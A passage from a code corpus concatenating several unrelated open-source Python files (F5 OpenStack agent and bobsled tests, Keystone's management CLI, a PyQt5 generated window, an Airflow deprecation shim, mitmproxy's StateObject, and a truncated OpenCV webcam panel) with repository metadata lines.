__description__ = "Smart-quotes, smart-ellipses, and smart-dashes for unicode and HTML/XML usage."
| bsd-3-clause | 1,224,853,548,445,480,000 | 34.093333 | 209 | 0.594868 | false |
F5Networks/f5-openstack-agent | f5_openstack_agent/lbaasv2/drivers/bigip/test/test_esd_filehandler.py | 1 | 3416 | # coding=utf-8
# Copyright (c) 2017,2018, F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from f5_openstack_agent.lbaasv2.drivers.bigip.esd_filehandler import \
EsdJSONValidation
from f5_openstack_agent.lbaasv2.drivers.bigip import exceptions as f5_ex
class TestEsdFileHanlder(object):
remaining_path = 'f5_openstack_agent/lbaasv2/drivers/bigip/test/json'
@staticmethod
def assertEqual(obj1, obj2, note=''):
assert obj1 == obj2, note
@staticmethod
def assertRaises(exc):
return pytest.raises(exc)
@staticmethod
def assertIn(obj1, dict_obj, note=''):
assert obj1 in dict_obj, note
def test_invalid_dir_name(self):
# invliad directory name
reader = EsdJSONValidation('/as87awoiujasdf/')
assert not reader.esdJSONFileList
def test_no_files(self, get_relative_path):
# verify no files in empty directory
reader = EsdJSONValidation(
'{}/{}/empty_dir'.format(get_relative_path, self.remaining_path))
assert not reader.esdJSONFileList
def test_no_json_files(self, get_relative_path):
# verify no files are read in dir that contains non-JSON files
reader = EsdJSONValidation(
'{}/{}/no_json'.format(get_relative_path, self.remaining_path))
assert not reader.esdJSONFileList
def test_mix_json_files(self, get_relative_path):
# verify single JSON file
reader = EsdJSONValidation(
'{}/{}/mix_json/'.format(get_relative_path, self.remaining_path))
self.assertEqual(1, len(reader.esdJSONFileList))
def test_json_only_files(self, get_relative_path):
# expect three files
reader = EsdJSONValidation(
'{}/{}/valid'.format(get_relative_path, self.remaining_path))
self.assertEqual(3, len(reader.esdJSONFileList))
def test_invalid_json(self, get_relative_path):
handler = EsdJSONValidation(
'{}/{}/invalid'.format(get_relative_path, self.remaining_path))
# verify exception raised
with self.assertRaises(f5_ex.esdJSONFileInvalidException):
handler.read_json()
def test_valid_json(self, get_relative_path):
handler = EsdJSONValidation(
'{}/{}/valid/'.format(get_relative_path, self.remaining_path))
dict = handler.read_json()
# verify keys in the final dictionary
self.assertIn('app_type_1', dict)
self.assertIn('app_type_2', dict)
self.assertIn('app_type_3', dict)
def test_empty_json(self, get_relative_path):
# verify empty file is read
handler = EsdJSONValidation(
'{}/{}/empty_file/'.format(get_relative_path, self.remaining_path))
self.assertEqual(1, len(handler.esdJSONFileList))
# verify empty dict is returned
dict = handler.read_json()
assert not dict
| apache-2.0 | -3,588,960,012,076,840,400 | 35.340426 | 79 | 0.668326 | false |
openstates/bobsled | bobsled/tests/test_environment.py | 1 | 1546 | import os
import pytest
from unittest import mock
from ..environment import EnvironmentProvider
from ..base import Environment
@pytest.fixture
def simpleenv():
filename = os.path.join(os.path.dirname(__file__), "environments.yml")
return EnvironmentProvider(filename)
@pytest.mark.asyncio
async def test_get_environment_names(simpleenv):
await simpleenv.update_environments()
assert set(simpleenv.get_environment_names()) == {"one", "two"}
@pytest.mark.asyncio
async def test_get_environment(simpleenv):
await simpleenv.update_environments()
assert simpleenv.get_environment("one") == Environment(
"one", {"number": 123, "word": "hello"}, ["word"]
)
@pytest.mark.asyncio
async def test_mask_variables(simpleenv):
await simpleenv.update_environments()
assert (
simpleenv.mask_variables("hello this is a test, but 123 is masked")
== "hello this is a test, but **ONE/NUMBER** is masked"
)
@pytest.mark.asyncio
async def test_get_environment_paramstore():
filename = os.path.join(os.path.dirname(__file__), "paramstore_env.yml")
psenv = EnvironmentProvider(filename)
# patch paramstore loader so we don't have to do a bunch of moto stuff that
# doesn't really work well with async
with mock.patch("bobsled.environment.paramstore_loader", new=lambda x: "ps-" + x):
await psenv.update_environments()
assert psenv.get_environment("one") == Environment(
"one", {"number": "ps-/bobsledtest/number", "word": "ps-/bobsledtest/word"}, []
)
| mit | -3,136,788,783,062,574,600 | 31.893617 | 87 | 0.695343 | false |
ging/keystone | keystone/cli.py | 1 | 11656 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import os
from oslo.config import cfg
import pbr.version
from keystone import assignment
from keystone.common import openssl
from keystone.common import sql
from keystone.common.sql import migration_helpers
from keystone.common import utils
from keystone import config
from keystone.i18n import _
from keystone import identity
from keystone.openstack.common import log
from keystone import token
LOG = log.getLogger(__name__)
CONF = config.CONF
class BaseApp(object):
name = None
@classmethod
def add_argument_parser(cls, subparsers):
parser = subparsers.add_parser(cls.name, help=cls.__doc__)
parser.set_defaults(cmd_class=cls)
return parser
class DbSync(BaseApp):
"""Sync the database."""
name = 'db_sync'
@classmethod
def add_argument_parser(cls, subparsers):
parser = super(DbSync, cls).add_argument_parser(subparsers)
parser.add_argument('version', default=None, nargs='?',
help=('Migrate the database up to a specified '
'version. If not provided, db_sync will '
'migrate the database to the latest known '
'version.'))
parser.add_argument('--extension', default=None,
help=('Migrate the database for the specified '
'extension. If not provided, db_sync will '
'migrate the common repository.'))
parser.add_argument('--populate', action='store_true',
help=('Populate the database with inital data '
'instead of migrating tables. Only use '
'this option after running all migrations. '
'This option is not compatible with the '
'version or extension options. '
'If not provided, db_sync will function '
'normally.'))
return parser
@staticmethod
def main():
version = CONF.command.version
extension = CONF.command.extension
populate = CONF.command.populate
if populate:
extension = 'initial_data'
migration_helpers.sync_database_to_version(extension, version)
class DbVersion(BaseApp):
"""Print the current migration version of the database."""
name = 'db_version'
@classmethod
def add_argument_parser(cls, subparsers):
parser = super(DbVersion, cls).add_argument_parser(subparsers)
parser.add_argument('--extension', default=None,
help=('Migrate the database for the specified '
'extension. If not provided, db_sync will '
'migrate the common repository.'))
@staticmethod
def main():
extension = CONF.command.extension
migration_helpers.print_db_version(extension)
class BaseCertificateSetup(BaseApp):
"""Common user/group setup for PKI and SSL generation."""
@classmethod
def add_argument_parser(cls, subparsers):
parser = super(BaseCertificateSetup,
cls).add_argument_parser(subparsers)
running_as_root = (os.geteuid() == 0)
parser.add_argument('--keystone-user', required=running_as_root)
parser.add_argument('--keystone-group', required=running_as_root)
parser.add_argument('--rebuild', default=False, action='store_true',
help=('Rebuild certificate files: erase previous '
'files and regenerate them.'))
return parser
@staticmethod
def get_user_group():
keystone_user_id = None
keystone_group_id = None
try:
a = CONF.command.keystone_user
if a:
keystone_user_id = utils.get_unix_user(a)[0]
except KeyError:
raise ValueError("Unknown user '%s' in --keystone-user" % a)
try:
a = CONF.command.keystone_group
if a:
keystone_group_id = utils.get_unix_group(a)[0]
except KeyError:
raise ValueError("Unknown group '%s' in --keystone-group" % a)
return keystone_user_id, keystone_group_id
class PKISetup(BaseCertificateSetup):
"""Set up Key pairs and certificates for token signing and verification.
This is NOT intended for production use, see Keystone Configuration
documentation for details.
"""
name = 'pki_setup'
@classmethod
def main(cls):
msg = _('keystone-manage pki_setup is not recommended for production '
'use.')
LOG.warn(msg)
keystone_user_id, keystone_group_id = cls.get_user_group()
conf_pki = openssl.ConfigurePKI(keystone_user_id, keystone_group_id,
rebuild=CONF.command.rebuild)
conf_pki.run()
class SSLSetup(BaseCertificateSetup):
"""Create key pairs and certificates for HTTPS connections.
This is NOT intended for production use, see Keystone Configuration
documentation for details.
"""
name = 'ssl_setup'
@classmethod
def main(cls):
msg = _('keystone-manage ssl_setup is not recommended for production '
'use.')
LOG.warn(msg)
keystone_user_id, keystone_group_id = cls.get_user_group()
conf_ssl = openssl.ConfigureSSL(keystone_user_id, keystone_group_id,
rebuild=CONF.command.rebuild)
conf_ssl.run()
class TokenFlush(BaseApp):
"""Flush expired tokens from the backend."""
name = 'token_flush'
@classmethod
def main(cls):
token_manager = token.persistence.PersistenceManager()
token_manager.driver.flush_expired_tokens()
class MappingPurge(BaseApp):
"""Purge the mapping table."""
name = 'mapping_purge'
@classmethod
def add_argument_parser(cls, subparsers):
parser = super(MappingPurge, cls).add_argument_parser(subparsers)
parser.add_argument('--all', default=False, action='store_true',
help=('Purge all mappings.'))
parser.add_argument('--domain-name', default=None,
help=('Purge any mappings for the domain '
'specified.'))
parser.add_argument('--public-id', default=None,
help=('Purge the mapping for the Public ID '
'specified.'))
parser.add_argument('--local-id', default=None,
help=('Purge the mappings for the Local ID '
'specified.'))
parser.add_argument('--type', default=None, choices=['user', 'group'],
help=('Purge any mappings for the type '
'specified.'))
return parser
@staticmethod
def main():
def validate_options():
# NOTE(henry-nash); It would be nice to use the argparse automated
# checking for this validation, but the only way I can see doing
# that is to make the default (i.e. if no optional parameters
# are specified) to purge all mappings - and that sounds too
# dangerous as a default. So we use it in a slightly
# unconventional way, where all parameters are optional, but you
# must specify at least one.
if (CONF.command.all is False and
CONF.command.domain_name is None and
CONF.command.public_id is None and
CONF.command.local_id is None and
CONF.command.type is None):
raise ValueError(_('At least one option must be provided'))
if (CONF.command.all is True and
(CONF.command.domain_name is not None or
CONF.command.public_id is not None or
CONF.command.local_id is not None or
CONF.command.type is not None)):
raise ValueError(_('--all option cannot be mixed with '
'other options'))
def get_domain_id(name):
try:
identity.Manager()
assignment_manager = assignment.Manager()
return assignment_manager.driver.get_domain_by_name(name)['id']
except KeyError:
raise ValueError(_("Unknown domain '%(name)s' specified by "
"--domain-name") % {'name': name})
validate_options()
# Now that we have validated the options, we know that at least one
# option has been specified, and if it was the --all option then this
# was the only option specified.
#
# The mapping dict is used to filter which mappings are purged, so
# leaving it empty means purge them all
mapping = {}
if CONF.command.domain_name is not None:
mapping['domain_id'] = get_domain_id(CONF.command.domain_name)
if CONF.command.public_id is not None:
mapping['public_id'] = CONF.command.public_id
if CONF.command.local_id is not None:
mapping['local_id'] = CONF.command.local_id
if CONF.command.type is not None:
mapping['type'] = CONF.command.type
mapping_manager = identity.MappingManager()
mapping_manager.driver.purge_mappings(mapping)
class SamlIdentityProviderMetadata(BaseApp):
"""Generate Identity Provider metadata."""
name = 'saml_idp_metadata'
@staticmethod
def main():
# NOTE(marek-denis): Since federation is currently an extension import
# corresponding modules only when they are really going to be used.
from keystone.contrib.federation import idp
metadata = idp.MetadataGenerator().generate_metadata()
print(metadata.to_string())
CMDS = [
DbSync,
DbVersion,
MappingPurge,
PKISetup,
SamlIdentityProviderMetadata,
SSLSetup,
TokenFlush,
]
def add_command_parsers(subparsers):
for cmd in CMDS:
cmd.add_argument_parser(subparsers)
command_opt = cfg.SubCommandOpt('command',
title='Commands',
help='Available commands',
handler=add_command_parsers)
def main(argv=None, config_files=None):
CONF.register_cli_opt(command_opt)
config.configure()
sql.initialize()
config.set_default_for_default_log_levels()
CONF(args=argv[1:],
project='keystone',
version=pbr.version.VersionInfo('keystone').version_string(),
usage='%(prog)s [' + '|'.join([cmd.name for cmd in CMDS]) + ']',
default_config_files=config_files)
config.setup_logging()
CONF.command.cmd_class.main()
| apache-2.0 | -4,861,469,383,268,838,000 | 34.975309 | 79 | 0.590254 | false |
hueyyeng/AssetsBrowser | ui/window/ui_main.py | 1 | 12124 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'K:\Library\Python\AssetsBrowser\ui\window\main.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setWindowModality(QtCore.Qt.NonModal)
MainWindow.resize(851, 603)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(800, 600))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(8)
MainWindow.setFont(font)
MainWindow.setDocumentMode(False)
MainWindow.setTabShape(QtWidgets.QTabWidget.Rounded)
self.centralWidget = QtWidgets.QWidget(MainWindow)
self.centralWidget.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.centralWidget.sizePolicy().hasHeightForWidth())
self.centralWidget.setSizePolicy(sizePolicy)
self.centralWidget.setMinimumSize(QtCore.QSize(800, 550))
self.centralWidget.setObjectName("centralWidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralWidget)
self.gridLayout.setObjectName("gridLayout")
self.splitter = QtWidgets.QSplitter(self.centralWidget)
self.splitter.setEnabled(True)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setChildrenCollapsible(False)
self.splitter.setObjectName("splitter")
self.actionWidget = QtWidgets.QWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.actionWidget.sizePolicy().hasHeightForWidth())
self.actionWidget.setSizePolicy(sizePolicy)
self.actionWidget.setMinimumSize(QtCore.QSize(230, 0))
self.actionWidget.setMaximumSize(QtCore.QSize(230, 16777215))
self.actionWidget.setObjectName("actionWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.actionWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.labelProject = QtWidgets.QLabel(self.actionWidget)
self.labelProject.setObjectName("labelProject")
self.verticalLayout.addWidget(self.labelProject)
self.projectComboBox = QtWidgets.QComboBox(self.actionWidget)
self.projectComboBox.setLayoutDirection(QtCore.Qt.LeftToRight)
self.projectComboBox.setSizeAdjustPolicy(QtWidgets.QComboBox.AdjustToContentsOnFirstShow)
self.projectComboBox.setFrame(True)
self.projectComboBox.setObjectName("projectComboBox")
self.verticalLayout.addWidget(self.projectComboBox)
self.pushBtnNewAsset = QtWidgets.QPushButton(self.actionWidget)
self.pushBtnNewAsset.setObjectName("pushBtnNewAsset")
self.verticalLayout.addWidget(self.pushBtnNewAsset)
self.pushBtnNewAssetItem = QtWidgets.QPushButton(self.actionWidget)
self.pushBtnNewAssetItem.setObjectName("pushBtnNewAssetItem")
self.verticalLayout.addWidget(self.pushBtnNewAssetItem)
self.pushBtnManageFormat = QtWidgets.QPushButton(self.actionWidget)
self.pushBtnManageFormat.setObjectName("pushBtnManageFormat")
self.verticalLayout.addWidget(self.pushBtnManageFormat)
self.debugCheckBox = QtWidgets.QCheckBox(self.actionWidget)
self.debugCheckBox.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.debugCheckBox.sizePolicy().hasHeightForWidth())
self.debugCheckBox.setSizePolicy(sizePolicy)
self.debugCheckBox.setObjectName("debugCheckBox")
self.verticalLayout.addWidget(self.debugCheckBox)
self.textEdit = QtWidgets.QTextEdit(self.actionWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.textEdit.sizePolicy().hasHeightForWidth())
self.textEdit.setSizePolicy(sizePolicy)
self.textEdit.setObjectName("textEdit")
self.verticalLayout.addWidget(self.textEdit)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.MinimumExpanding)
self.verticalLayout.addItem(spacerItem)
self.labelCredits = QtWidgets.QLabel(self.actionWidget)
self.labelCredits.setTextFormat(QtCore.Qt.AutoText)
self.labelCredits.setOpenExternalLinks(True)
self.labelCredits.setObjectName("labelCredits")
self.verticalLayout.addWidget(self.labelCredits)
self.labelCredits.raise_()
self.debugCheckBox.raise_()
self.pushBtnNewAsset.raise_()
self.labelProject.raise_()
self.textEdit.raise_()
self.projectComboBox.raise_()
self.pushBtnNewAssetItem.raise_()
self.pushBtnManageFormat.raise_()
self.tabWidget = QtWidgets.QTabWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setObjectName("tabWidget")
self.tabHelp = QtWidgets.QWidget()
self.tabHelp.setObjectName("tabHelp")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.tabHelp)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.frameHelp = QtWidgets.QFrame(self.tabHelp)
self.frameHelp.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frameHelp.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameHelp.setObjectName("frameHelp")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.frameHelp)
self.horizontalLayout.setObjectName("horizontalLayout")
self.textBrowserHelp = QtWidgets.QTextBrowser(self.frameHelp)
self.textBrowserHelp.setOpenExternalLinks(True)
self.textBrowserHelp.setObjectName("textBrowserHelp")
self.horizontalLayout.addWidget(self.textBrowserHelp)
self.horizontalLayout_3.addWidget(self.frameHelp)
self.tabWidget.addTab(self.tabHelp, "")
self.gridLayout.addWidget(self.splitter, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralWidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 851, 21))
self.menubar.setObjectName("menubar")
self.menuFile = QtWidgets.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
self.menuView = QtWidgets.QMenu(self.menubar)
self.menuView.setObjectName("menuView")
self.menuHelp = QtWidgets.QMenu(self.menubar)
self.menuHelp.setObjectName("menuHelp")
self.menuSettings = QtWidgets.QMenu(self.menubar)
self.menuSettings.setObjectName("menuSettings")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setEnabled(True)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionQuit = QtWidgets.QAction(MainWindow)
self.actionQuit.setObjectName("actionQuit")
self.actionAbout = QtWidgets.QAction(MainWindow)
self.actionAbout.setObjectName("actionAbout")
self.actionAlwaysOnTop = QtWidgets.QAction(MainWindow)
self.actionAlwaysOnTop.setCheckable(True)
self.actionAlwaysOnTop.setObjectName("actionAlwaysOnTop")
self.actionPreferences = QtWidgets.QAction(MainWindow)
self.actionPreferences.setObjectName("actionPreferences")
self.actionNewAsset = QtWidgets.QAction(MainWindow)
self.actionNewAsset.setObjectName("actionNewAsset")
self.actionNewAssetItem = QtWidgets.QAction(MainWindow)
self.actionNewAssetItem.setObjectName("actionNewAssetItem")
self.actionApplicationsList = QtWidgets.QAction(MainWindow)
self.actionApplicationsList.setObjectName("actionApplicationsList")
self.actionManageFormat = QtWidgets.QAction(MainWindow)
self.actionManageFormat.setObjectName("actionManageFormat")
self.menuFile.addAction(self.actionNewAsset)
self.menuFile.addAction(self.actionNewAssetItem)
self.menuFile.addAction(self.actionManageFormat)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionQuit)
self.menuView.addAction(self.actionAlwaysOnTop)
self.menuHelp.addAction(self.actionAbout)
self.menuSettings.addAction(self.actionPreferences)
self.menuSettings.addAction(self.actionApplicationsList)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuView.menuAction())
self.menubar.addAction(self.menuSettings.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Assets Browser"))
self.labelProject.setText(_translate("MainWindow", "Project:"))
self.pushBtnNewAsset.setText(_translate("MainWindow", "Create New Asset"))
self.pushBtnNewAssetItem.setText(_translate("MainWindow", "Create New Asset Item"))
self.pushBtnManageFormat.setText(_translate("MainWindow", "Manage Asset Item Format"))
self.debugCheckBox.setText(_translate("MainWindow", "Show Debug Panel"))
self.labelCredits.setText(_translate("MainWindow", "<html><head/><body><p>Huey Yeng © 2017-2021</p><p><a href=\"https://taukeke.com\"><span style=\" text-decoration: underline; color:#0000ff;\">taukeke.com<br/></span></a><a href=\"https://github.com/hueyyeng/AssetsBrowser\"><span style=\" text-decoration: underline; color:#0000ff;\">Assets Browser@ GitHub</span></a></p></body></html>"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabHelp), _translate("MainWindow", "Help"))
self.menuFile.setTitle(_translate("MainWindow", "&File"))
self.menuView.setTitle(_translate("MainWindow", "&View"))
self.menuHelp.setTitle(_translate("MainWindow", "&Help"))
self.menuSettings.setTitle(_translate("MainWindow", "&Settings"))
self.actionQuit.setText(_translate("MainWindow", "&Quit"))
self.actionAbout.setText(_translate("MainWindow", "&About Assets Browser"))
self.actionAlwaysOnTop.setText(_translate("MainWindow", "Always on &Top"))
self.actionPreferences.setText(_translate("MainWindow", "&Preferences..."))
self.actionNewAsset.setText(_translate("MainWindow", "&New Asset"))
self.actionNewAssetItem.setText(_translate("MainWindow", "New &Asset Item"))
self.actionApplicationsList.setText(_translate("MainWindow", "&Applications List..."))
self.actionManageFormat.setText(_translate("MainWindow", "&Manage Asset Item Format"))
| mit | -3,948,126,092,516,333,000 | 58.136585 | 398 | 0.73043 | false |
nathanielvarona/airflow | airflow/contrib/operators/gcp_video_intelligence_operator.py | 1 | 1369 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This module is deprecated.
Please use :mod:`airflow.providers.google.cloud.operators.video_intelligence`.
"""
import warnings
# pylint: disable=unused-import
from airflow.providers.google.cloud.operators.video_intelligence import ( # noqa
CloudVideoIntelligenceDetectVideoExplicitContentOperator,
CloudVideoIntelligenceDetectVideoLabelsOperator,
CloudVideoIntelligenceDetectVideoShotsOperator,
)
warnings.warn(
"This module is deprecated. Please use `airflow.providers.google.cloud.operators.video_intelligence`",
DeprecationWarning,
stacklevel=2,
)
| apache-2.0 | 2,743,764,292,504,711,700 | 37.027778 | 106 | 0.784514 | false |
vhaupert/mitmproxy | mitmproxy/stateobject.py | 1 | 3417 | import json
import typing
from mitmproxy.coretypes import serializable
from mitmproxy.utils import typecheck
class StateObject(serializable.Serializable):
"""
An object with serializable state.
State attributes can either be serializable types(str, tuple, bool, ...)
or StateObject instances themselves.
"""
_stateobject_attributes: typing.ClassVar[typing.MutableMapping[str, typing.Any]]
"""
An attribute-name -> class-or-type dict containing all attributes that
should be serialized. If the attribute is a class, it must implement the
Serializable protocol.
"""
def get_state(self):
"""
Retrieve object state.
"""
state = {}
for attr, cls in self._stateobject_attributes.items():
val = getattr(self, attr)
state[attr] = get_state(cls, val)
return state
def set_state(self, state):
"""
Load object state from data returned by a get_state call.
"""
state = state.copy()
for attr, cls in self._stateobject_attributes.items():
val = state.pop(attr)
if val is None:
setattr(self, attr, val)
else:
curr = getattr(self, attr, None)
if hasattr(curr, "set_state"):
curr.set_state(val)
else:
setattr(self, attr, make_object(cls, val))
if state:
raise RuntimeWarning("Unexpected State in __setstate__: {}".format(state))
def _process(typeinfo: typecheck.Type, val: typing.Any, make: bool) -> typing.Any:
if val is None:
return None
elif make and hasattr(typeinfo, "from_state"):
return typeinfo.from_state(val)
elif not make and hasattr(val, "get_state"):
return val.get_state()
typename = str(typeinfo)
if typename.startswith("typing.List"):
T = typecheck.sequence_type(typeinfo)
return [_process(T, x, make) for x in val]
elif typename.startswith("typing.Tuple"):
Ts = typecheck.tuple_types(typeinfo)
if len(Ts) != len(val):
raise ValueError("Invalid data. Expected {}, got {}.".format(Ts, val))
return tuple(
_process(T, x, make) for T, x in zip(Ts, val)
)
elif typename.startswith("typing.Dict"):
k_cls, v_cls = typecheck.mapping_types(typeinfo)
return {
_process(k_cls, k, make): _process(v_cls, v, make)
for k, v in val.items()
}
elif typename.startswith("typing.Any"):
# This requires a bit of explanation. We can't import our IO layer here,
# because it causes a circular import. Rather than restructuring the
# code for this, we use JSON serialization, which has similar primitive
# type restrictions as tnetstring, to check for conformance.
try:
json.dumps(val)
except TypeError:
raise ValueError(f"Data not serializable: {val}")
return val
else:
return typeinfo(val)
def make_object(typeinfo: typecheck.Type, val: typing.Any) -> typing.Any:
"""Create an object based on the state given in val."""
return _process(typeinfo, val, True)
def get_state(typeinfo: typecheck.Type, val: typing.Any) -> typing.Any:
"""Get the state of the object given as val."""
return _process(typeinfo, val, False)
| mit | 1,843,769,143,436,569,600 | 33.515152 | 86 | 0.60755 | false |
rechner/Taxidi | webcam.py | 1 | 18402 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
#TODO: Update for use with new API
#TODO: Read config, optionally disable rectangle.
#TODO: Create Destroy() method
#TODO: Implement file system organization, handle converting & uploading image to server.
#TODO: Use gstreamer for Linux instead of opencv - better performance(?)
#This is needed for PIL to import in OS X (FIXME)
import sys
sys.path.append('/opt/local/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/site-packages')
import os
import wx
import wx.lib.imagebrowser as ib
import logging
import conf
from itertools import *
from operator import itemgetter
from PIL import Image
if conf.as_bool(conf.config['webcam']['enable']):
import opencv
from opencv import cv, highgui
class LivePanel(wx.Panel):
"""
Creates a wxPanel for capturing from an USB webcam with OpenCV, meaning
this works with all platforms OpenCV works with (Linux, OS X, Windows).
Initialize just like a wx.Panel, optionally specifying a camera index, starting
from 0. Default of -1 will automatically select the first useable device.
"""
def __init__(self, parent, id, camera=-1):
wx.Panel.__init__(self, parent, id, style=wx.NO_BORDER)
self.camera = camera
self.cap = highgui.cvCreateCameraCapture(camera)
wximg = wx.Image('resources/icons/camera-error-128.png')
self.errorBitmap = wximg.ConvertToBitmap()
self._error = 0
self.store = Storage()
self.Bind(wx.EVT_IDLE, self.onIdle)
def onIdle(self, event):
"""
Event to grab and display a frame from the camera. (internal use).
"""
if self.cap == None: #Should be cvCameraCapture instance.
#unbind the idle instance, change to click.
highgui.cvReleaseCapture(self.cap) #release the old instance and
self.cap = highgui.cvCreateCameraCapture(self.camera) #try new one.
self.displayError(self.errorBitmap, (128, 128))
raise CameraError('Unable to open camera, retrying....')
event.Skip()
try:
img = highgui.cvQueryFrame(self.cap)
except cv2.error as e:
raise CameraError('Error when querying for frame: {0}'.format(e))
self._error = 0 #worked successfully
img = opencv.cvGetMat(img)
cv.cvCvtColor(img, img, cv.CV_BGR2RGB)
if conf.as_bool(conf.config['webcam']['cropBars']):
#Draw cropping region
cv.cvRectangle(img, (80, -1), (560, 480), (205.0, 0.0, 0.0, 0.0), 2)
self.displayImage(img)
event.RequestMore()
def open(self, camera=-1):
"""
Open a capture device after __init__ has been called. Call close() first
before opening a new device. Takes camera index as an option.
"""
self.cap = highgui.cvCreateCameraCapture(camera)
self.Bind(wx.EVT_IDLE, self.onIdle)
pass
def close(self):
"""
Close a capture device and stops writing frames to the screen.
"""
highgui.cvReleaseCapture(self.cap)
self.Unbind(wx.EVT_IDLE)
def suspend(self):
"""
Suspend writing frames to the screen. Should be called when widget is hidden
to prevent excessive CPU usage.
"""
self.Unbind(wx.EVT_IDLE)
def resume(self):
"""
Resume reading and outputting frames.
"""
self.Bind(wx.EVT_IDLE, self.onIdle)
def displayImage(self, img, offset=(0,0)):
"""
Internal function for writing a bitmap grabbed from OpenCV to the panel.
"""
bitmap = wx.BitmapFromBuffer(img.width, img.height, img.imageData)
dc = wx.ClientDC(self)
dc.DrawBitmap(bitmap, offset[0], offset[1], False)
def displayError(self, bitmap, offset=(0,0)):
"""
Shows an error message saying the video device was not found.
Accepts bitmap as wx.Bitmap and position. Optimized for 128x128.
"""
#FIXME: (Minor) a bit of flicker on the error message.
if self._error > 2: #Only redraw if needed.
self.Unbind(wx.EVT_IDLE)
self.Unbind(wx.EVT_LEFT_UP) #just in case
self.Bind(wx.EVT_LEFT_UP, self.onClick)
return 0
boldfont = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)
boldfont.SetWeight(wx.BOLD)
boldfont.SetPointSize(16)
